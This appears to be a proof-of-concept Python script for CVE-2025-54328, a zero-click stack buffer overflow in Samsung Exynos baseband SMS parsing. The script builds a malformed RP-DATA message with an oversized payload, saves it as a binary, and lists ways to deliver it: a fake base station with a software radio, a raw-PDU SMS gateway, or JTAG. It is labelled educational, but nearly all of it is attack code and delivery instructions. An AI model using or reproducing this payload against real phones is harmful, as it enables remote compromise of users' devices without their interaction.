README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Conceptual PoC for CVE-2025-54328
Samsung Exynos SMS RP-DATA Stack-based Buffer Overflow
This script generates a malicious RP-DATA message with an oversized
TPDU payload designed to overflow a fixed-size stack buffer in the
Samsung Shannon baseband firmware's SMS parser.
Full article: https://www.hunt-benito.com/samsung-exynos-sms-stack-overflow-cve-2025-54328-critical-zero-click-baseband-rce/
FOR EDUCATIONAL AND AUTHORIZED SECURITY RESEARCH ONLY.
"""
import struct
import sys
def build_rp_data_overflow(target_number="1234567890", overflow_size=200):
"""
Build a malicious RP-DATA (Network -> MS) message.
RP-DATA format per 3GPP TS 24.011 Section 7.3.1:
- Message Type: 1 octet (0x00 = network to MS)
- Message Reference: 1 octet
- RP-Originator Address: variable (Length + BCD address)
- RP-Destination Address: variable (Length + BCD address)
- RP-User Data: variable (Length + TPDU)
"""
msg_type = 0x00
msg_ref = 0x01
rp_originator = b'\x00'
digits = target_number.lstrip('+')
dest_addr_digits = bytes([(int(digits[i]) << 4) | (int(digits[i+1]) if i+1 < len(digits) else 0x0f)
for i in range(0, len(digits), 2)])
dest_len = len(dest_addr_digits) + 1
rp_destination = struct.pack('B', dest_len) + b'\x91' + dest_addr_digits
tpdu = bytearray()
tpdu.append(0x04)
tpdu.extend(b'\x02\x91\x12\xf1')
tpdu.append(0x00)
tpdu.append(0x00)
tpdu.extend(b'\x62\x40\x60\x21\x00\x00\x00')
tpdu.append(overflow_size)
pattern = b'\x41' * overflow_size
tpdu.extend(pattern)
rp_user_data = struct.pack('B', len(tpdu)) + tpdu
rp_data = bytes([msg_type, msg_ref]) + rp_originator + rp_destination + rp_user_data
return rp_data
def main():
print("=" * 60)
print("CVE-2025-54328 - Conceptual PoC")
print("Samsung Exynos SMS RP-DATA Stack Buffer Overflow")
print("=" * 60)
print()
if len(sys.argv) > 1:
target = sys.argv[1]
else:
target = "1234567890"
overflow_size = 200
rp_data = build_rp_data_overflow(target, overflow_size)
print(f"[*] Target MSISDN: {target}")
print(f"[*] Overflow payload size: {overflow_size} bytes")
print(f"[*] Total RP-DATA message size: {len(rp_data)} bytes")
print()
print("[*] RP-DATA hex dump (first 64 bytes):")
for i in range(0, min(64, len(rp_data)), 16):
hex_str = ' '.join(f'{b:02x}' for b in rp_data[i:i+16])
print(f" {i:04x}: {hex_str}")
if len(rp_data) > 64:
print(f" ... ({len(rp_data) - 64} more bytes)")
print()
print("[*] Attack flow:")
print(" 1. Baseband receives RP-DATA on NAS/SAPI=3 bearer")
print(" 2. Shannon firmware parses RP-User Data field")
print(f" 3. TP-UD ({overflow_size} bytes) copied into fixed-size stack buffer")
print(" 4. Stack buffer overflows -> return address overwritten")
print(" 5. Execution redirected to attacker-controlled code")
print()
output_file = "cve-2025-54328-poc-rpdata.bin"
with open(output_file, 'wb') as f:
f.write(rp_data)
print(f"[+] Raw RP-DATA message saved to: {output_file}")
print()
print("[!] To inject this message, you would need:")
print(" - A fake BTS (OpenBTS/srsRAN) + SDR (USRP/HackRF)")
print(" - Or an SMS gateway with raw PDU mode access")
print(" - Or direct memory injection via JTAG/UART on the baseband")
if __name__ == '__main__':
main()